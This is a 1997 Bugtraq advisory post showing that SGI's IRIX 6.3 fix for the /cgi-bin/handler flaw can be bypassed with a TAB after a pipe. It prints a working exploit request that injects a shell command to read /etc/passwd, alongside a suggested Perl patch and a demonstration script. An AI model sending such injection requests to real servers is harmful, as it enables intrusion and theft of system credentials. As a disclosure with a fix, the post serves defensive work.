Bugtraq mailing list archives

/cgi-bin/handler - more notes


From: drazvan () kappa ro (Razvan Dragomirescu)
Date: Thu, 19 Jun 1997 23:06:13 +0300


Hi,

I have had reports that my exploit for SGI's /cgi-bin/handler does not
work on IRIX 6.3 (on O2).  I analyzed the code provided with IRIX
6.3 and they tried to fix it, but they actually DID NOT.

They added a new line to the script:

$doc=~s/\|*$// (in plain English, this means "remove any number of '|'s at
end-of-string"). But guess what. It works just as well if you put another
TAB character after the "pipe" (so that the "pipe" is not at
end-of-string, the TAB is).

The exploit should read

telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat       /etc/passwd|    ?data=Download HTTP/1.0

It tricks the script into executing the command anyway.
Now, for those of you who want to patch it somehow, here's the best
solution that has been posted to me (all credits for it go to Wolfram
Schneider <wosch () apfel de>)

All "open" commands should check if their argument is really a
filename. You could use:

-f $doc && open (INPUT, $doc)

(Same thing as: if (-f $doc) { open (INPUT, $doc) }; the one written
above is more Perl style)
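As an added illustration (not the SGI handler script and not code from this post), here is a small Perl script that runs the IRIX 6.3 regex over constructed inputs, models Perl's two-argument open() rule for a trailing pipe without ever calling open() on them, and shows that the "-f $doc" check rejects both attack strings. Function names and the temporary file are assumptions of this example.

```perl
#!/usr/bin/perl
# Added illustration, not the SGI handler script: compares the IRIX 6.3
# sanitiser with the "-f $doc" check. Nothing here calls open() on the
# constructed strings; would_open_as_pipe() only models Perl's rule.
use strict;
use warnings;
use File::Temp qw(tempfile);

# IRIX 6.3 fix: strip any number of '|' at the very end of the string.
sub irix63_sanitise {
    my ($doc) = @_;
    $doc =~ s/\|*$//;
    return $doc;
}

# Two-argument open() trims surrounding whitespace, then treats a trailing
# '|' as "run this as a command". Modelled here instead of executed.
sub would_open_as_pipe {
    my ($doc) = @_;
    return $doc =~ /\|\s*$/ ? 1 : 0;
}

# Wolfram Schneider's check: only open arguments that are plain files.
sub safe_to_open {
    my ($doc) = @_;
    return (-f $doc) ? 1 : 0;
}

# A genuine document to show the check still admits legitimate input
# (constructed for this example, deleted on exit).
my ($fh, $real_file) = tempfile(UNLINK => 1);
print $fh "hello\n";
close $fh;

# Constructed inputs: a plain document, the original attack string, and the
# variant with a TAB after the pipe that slips past the 6.3 regex.
my @inputs = (
    $real_file,
    "whatever;cat\t/etc/passwd|",
    "whatever;cat\t/etc/passwd|\t",
);

for my $doc (@inputs) {
    my $cleaned = irix63_sanitise($doc);
    my $shown   = $doc =~ s/\t/\\t/gr;   # make the TABs visible
    printf "%-44s pipe-after-6.3-fix=%d  -f-check-allows=%d\n",
        "'$shown'", would_open_as_pipe($cleaned), safe_to_open($cleaned);
}
```

The second attack string still ends in a pipe once whitespace is trimmed, while "-f" admits only the real file.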

I'm waiting to hear from you (my thanks to Lamont Grandquist who pointed
out the problem on IRIX 6.3).

So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable.
Anyone on IRIX 6.4? :) (What does it run on BTW?)

Be good.
Razvan
-------------------------------------------------------------------------------
RazvanDragomirescu Organization: KappaNet E-Mail: drazvan () kappa ro,
drazvan () romania ro Alternate E-mail: drazvan () iname com, drazvan () guv ro,
drazvan () pub ro, drazvan () lbi ro Phone: +40-1-6866621 NIC-HANDLE: RD1604
RIPE-HANDLE: RD38-RIPE
NO CARRIER

"Smile, tomorrow will be worse" (Murphy)
-------------------------------------------------------------------------------


